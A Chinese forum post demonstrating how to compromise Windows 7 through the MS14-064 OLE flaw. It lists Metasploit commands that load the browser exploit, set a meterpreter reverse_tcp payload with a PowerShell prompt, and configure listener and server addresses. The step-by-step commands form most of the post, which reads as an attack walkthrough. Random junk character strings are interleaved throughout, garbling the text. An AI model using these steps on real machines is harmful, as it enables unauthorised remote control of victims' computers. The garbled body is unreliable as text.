找回密码
 立即注册
查看: 2096|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

5 x R+ f7 c4 E$ s; [8 I 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示+ b$ h! f2 _5 b( g, |/ P- L

- i$ d' ~7 m- M7 ^3 a

4 o7 Y4 a! c: x, g2 { 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 7 ~5 |: X) C( Z) F9 x

4 @: x5 Y+ r! {, U+ I

2 s" B9 p2 D8 E5 o- f! E 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp l8 b, i% C9 R6 u

! M; W& O& G: K* X- P

$ z. ^ V, ~( c- w: N# t             set AllowPowershellPrompt true( ~! w8 P$ R! W/ e) U5 ?

5 G" X2 y6 X% w" X# @

" z, r2 `5 x0 S U/ A$ D2 J             Set LHOST 192.168.0.109 5 F" S$ L- V1 V+ B- \, i

' s. F6 }" h$ d7 d

+ t) n$ h8 p9 M/ J             set SRVHOST 192.168.0.109! ]% D7 a2 V6 f$ W; ~9 C+ s; M" d

& z/ t+ m$ j2 X5 v" V

; y+ @# w/ s$ d2 @             Set uripath share : V1 r( M4 R* E2 s

4 }; D+ l. M/ d, W& L

$ X! f" `: E* x9 P- g             Set srvport 80 4 }' V- o2 A3 X E6 e- W6 X

% R& s- `& S3 y+ @" x

+ R3 s* y% Q L" E  . g9 t, @; b6 U( H, Q# ^+ ]" a3 T

% p. J* x- g0 H2 x

) x0 ?; [5 _: J+ O6 I( D   q" ^' J- S }% y& m$ m2 \0 a

0 X1 W% ~7 _5 V; q9 N# n8 W- s1 F

* s# c; ?& ]1 v4 G/ R1 I$ O8 M   0 y9 s9 Z/ W$ _1 [" ~

5 F) U) K0 h4 P

; x' r! _5 |& u' s3 A) E- ^  ) n% ~! _6 b3 F- ?! y

- ~$ |* {, t/ |) k6 f3 l

+ e% Q; r) Y) m  - U/ [4 S, {0 j3 e u

6 B& L$ E }: M4 V1 x

8 a" z1 {1 n6 e6 F9 c 下面我们来访问本地地址如图: F: k: M+ W) b5 \" |; n c

0 [ n6 w# N' {" m: f. O

5 Y* [ ^; R1 p- \- ~: U   ; H D; R5 Q; t5 j

; p! ~6 X/ t. O

2 g" b3 }2 Q3 ]/ s" [- V" c7 a) A" S   # d' l. L# Y7 c- i

^5 q( {- w% z I, h$ L

0 I9 Y( J% c4 c3 `1 T; W& E $ `& d2 M) c( F" _$ d p) c

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表